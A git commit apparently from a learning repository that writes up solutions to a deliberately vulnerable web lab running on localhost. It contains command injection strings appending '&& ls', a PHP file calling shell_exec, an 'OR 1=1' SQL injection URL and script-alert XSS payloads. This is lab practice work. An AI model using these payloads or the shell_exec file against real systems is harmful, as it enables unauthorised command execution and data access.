docs: 📝 Update readme with description of the challenge
This commit is contained in:
parent
ee54d76769
commit
afaae6aad0
@ -1,10 +1,14 @@
|
||||
# Command Injection
|
||||
The aim of this challenge is to inject a command to the server that execute a script.
|
||||
# Low
|
||||
```bash
|
||||
127.0.0.1 && ls
|
||||
```
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
```bash
|
||||
127.0.0.1 & ls
|
||||
```
|
||||
|
||||
# High
|
||||
> In progress
|
||||
|
4
File injection/exploit.php
Normal file
4
File injection/exploit.php
Normal file
@ -0,0 +1,4 @@
|
||||
<?php
|
||||
$output = shell_exec('ls');
|
||||
echo "<pre>$output</pre>";
|
||||
?>
|
@ -1,3 +1,6 @@
|
||||
# SQL Injection
|
||||
The aim of this challenge is to inject a SQL command to the server that execute a script.
|
||||
|
||||
# Low
|
||||
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
|
||||
|
||||
|
@ -1,3 +1,6 @@
|
||||
# XSS (DOM)
|
||||
The aim of this challenge is to inject a script to the server that execute a script.
|
||||
|
||||
# Low
|
||||
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
|
||||
|
||||
|
@ -1,3 +1,5 @@
|
||||
# Stored XSS
|
||||
The aim of this challenge is to inject a script to the server that execute a script.
|
||||
# Low
|
||||
```javascript
|
||||
<script>alert("XSS");</script>
|
||||
|
Loading…
x
Reference in New Issue
Block a user